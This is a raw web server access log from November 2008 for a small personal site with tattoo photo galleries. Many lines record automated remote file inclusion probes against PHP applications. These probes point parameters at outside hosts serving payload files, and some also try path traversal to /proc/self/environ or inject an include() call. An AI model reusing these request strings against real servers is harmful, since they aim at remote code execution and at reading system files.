69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
207.250.188.51 - - [15/Nov/2008:19:27:51 -0600] "GET /logs/access_log.1217548800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.110.13.63 - - [15/Nov/2008:19:27:57 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:57 -0600] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:57 -0600] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:57 -0600] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:57 -0600] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:57 -0600] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:57 -0600] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:58 -0600] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:58 -0600] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:58 -0600] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:58 -0600] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:11 -0600] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:12 -0600] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
207.250.188.51 - - [15/Nov/2008:19:28:14 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.250.188.51 - - [15/Nov/2008:19:28:14 -0600] "GET /logs/access_log.1216598400//admin/business_inc/saveserver.php?thisdir=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
24.143.139.77 - - [15/Nov/2008:19:28:20 -0600] "GET /logs///index.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:19:28:20 -0600] "GET ///index.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/set4.htm HTTP/1.1" 200 1694 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:28:23 -0600] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
83.223.116.60 - - [15/Nov/2008:19:31:13 -0600] "GET /logs/access_log.1217116800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.85.149.242 - - [15/Nov/2008:19:32:35 -0600] "GET /logs/access_log.1217030400/index.php?redir=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
70.85.149.242 - - [15/Nov/2008:19:32:35 -0600] "GET /index.php?redir=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
70.85.149.242 - - [15/Nov/2008:19:32:35 -0600] "GET /logs/index.php?redir=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
70.85.149.242 - - [15/Nov/2008:19:32:38 -0600] "GET /logs/access_log.1216944000/index.php?redir=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
89.218.85.18 - - [15/Nov/2008:19:34:19 -0600] "GET /video.php?content=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
89.218.85.18 - - [15/Nov/2008:19:34:19 -0600] "GET /logs/video.php?content=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
61.109.250.156 - - [15/Nov/2008:19:36:14 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:36:14 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:36:14 -0600] "GET /logs/access_log.1216684800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:36:50 -0600] "GET /logs/access_log.1215043200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.250.188.51 - - [15/Nov/2008:19:39:09 -0600] "GET /logs/access_log.1216425600%20%20//admin/business_inc/saveserver.php?thisdir=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.55.133.37 - - [15/Nov/2008:19:40:16 -0600] "GET //appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:19:40:16 -0600] "GET /logs//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:19:40:16 -0600] "GET /logs/access_log.1211587200//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:19:40:16 -0600] "GET /logs/access_log.1214179200//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
92.48.80.16 - - [15/Nov/2008:19:42:13 -0600] "GET /logs/access_log.1203638400 HTTP/1.1" 200 163840 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1"
92.48.80.16 - - [15/Nov/2008:19:42:19 -0600] "GET /logs/access_log.1206230400 HTTP/1.1" 200 195475 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040421"
213.193.220.6 - - [15/Nov/2008:19:43:26 -0600] "GET /logs/forum.php?act=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.193.220.6 - - [15/Nov/2008:19:43:26 -0600] "GET /forum.php?act=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.109.250.156 - - [15/Nov/2008:19:43:31 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:43:31 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:43:31 -0600] "GET /logs/access_log.1217116800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:43:36 -0600] "GET /logs/access_log.1216598400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.30.79.42 - - [15/Nov/2008:19:49:22 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.42 - - [15/Nov/2008:19:49:23 -0600] "GET /logs/access_log.1201132800 HTTP/1.0" 200 244341 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
24.143.139.77 - - [15/Nov/2008:19:50:00 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:19:50:00 -0600] "GET ///include/admin.lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:51:47 -0600] "GET //atom.php5?page=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:51:47 -0600] "GET /logs/access_log.1214524800//atom.php5?page=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:51:47 -0600] "GET /logs//atom.php5?page=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:51:58 -0600] "GET /logs/access_log.1214438400//atom.php5?page=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:52:16 -0600] "GET /logs/access_log.1208304000//newspublish/include.php?path%5Bdocroot%5D=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:52:16 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:52:16 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:54:04 -0600] "GET /logs/access_log.1216425600//ashnews.php?pathtoashnews=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:54:04 -0600] "GET /logs//ashnews.php?pathtoashnews=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:19:54:04 -0600] "GET //ashnews.php?pathtoashnews=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
89.108.67.204 - - [15/Nov/2008:19:54:50 -0600] "GET /logs/access_log.1205366400////vwar/backup/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
89.108.67.204 - - [15/Nov/2008:19:54:50 -0600] "GET ////vwar/backup/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
89.108.67.204 - - [15/Nov/2008:19:54:51 -0600] "GET /logs////vwar/backup/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
59.125.96.13 - - [15/Nov/2008:19:59:57 -0600] "GET /logs/index.php?dept=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
59.125.96.13 - - [15/Nov/2008:19:59:58 -0600] "GET /index.php?dept=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.232.66.174 - - [15/Nov/2008:20:00:40 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 299 "-""Advanced Browser (http://www.avantbrowser.com)"
77.232.66.174 - - [15/Nov/2008:20:00:40 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""XXXXXX"
77.232.66.174 - - [15/Nov/2008:20:00:40 -0600] "GET /logs/errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 299 "-""Advanced Browser (http://www.avantbrowser.com)"
77.232.66.174 - - [15/Nov/2008:20:00:40 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""XXXXXX"
77.232.66.174 - - [15/Nov/2008:20:00:41 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""XXXXXX"
77.232.66.174 - - [15/Nov/2008:20:00:41 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 294 "-""Advanced Browser (http://www.avantbrowser.com)"
77.232.66.174 - - [15/Nov/2008:20:00:41 -0600] "GET /errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 294 "-""Advanced Browser (http://www.avantbrowser.com)"
77.232.66.174 - - [15/Nov/2008:20:00:41 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""XXXXXX"
24.143.139.77 - - [15/Nov/2008:20:01:37 -0600] "GET /logs//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:20:01:38 -0600] "GET //errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:01:43 -0600] "GET /logs/access_log.1212278400//naboard_pnr.php?skin=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:01:50 -0600] "GET //naboard_pnr.php?skin=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:01:52 -0600] "GET /logs//naboard_pnr.php?skin=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 305 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:01:59 -0600] "GET /logs/access_log.1212364800//naboard_pnr.php?skin=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
208.69.123.58 - - [15/Nov/2008:20:02:15 -0600] "GET /logs/access_log.1206230400//Neos_Chronos/header.php?base_folder=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:02:15 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:02:15 -0600] "GET //Neos_Chronos/header.php?base_folder=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:02:22 -0600] "GET /logs/access_log.1208044800//Neos_Chronos/header.php?base_folder=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
87.94.1.95 - - [15/Nov/2008:20:02:26 -0600] "GET /logs///weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
87.94.1.95 - - [15/Nov/2008:20:02:26 -0600] "GET ///weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
72.55.133.37 - - [15/Nov/2008:20:02:52 -0600] "GET /logs/access_log.1206144000//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:02:52 -0600] "GET //appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:02:52 -0600] "GET /logs//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:04:09 -0600] "GET /logs//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:04:09 -0600] "GET /logs/access_log.1206403200//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:04:09 -0600] "GET //appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
89.218.85.18 - - [15/Nov/2008:20:05:31 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:05:31 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:05:34 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:05:34 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:05:42 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:05:43 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
208.69.123.58 - - [15/Nov/2008:20:05:48 -0600] "GET /logs/access_log.1206230400%20//Neos_Chronos/header.php?base_folder=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:06:26 -0600] "GET /logs//agendax/addevent.inc.php?agendax_path=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:06:26 -0600] "GET //agendax/addevent.inc.php?agendax_path=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
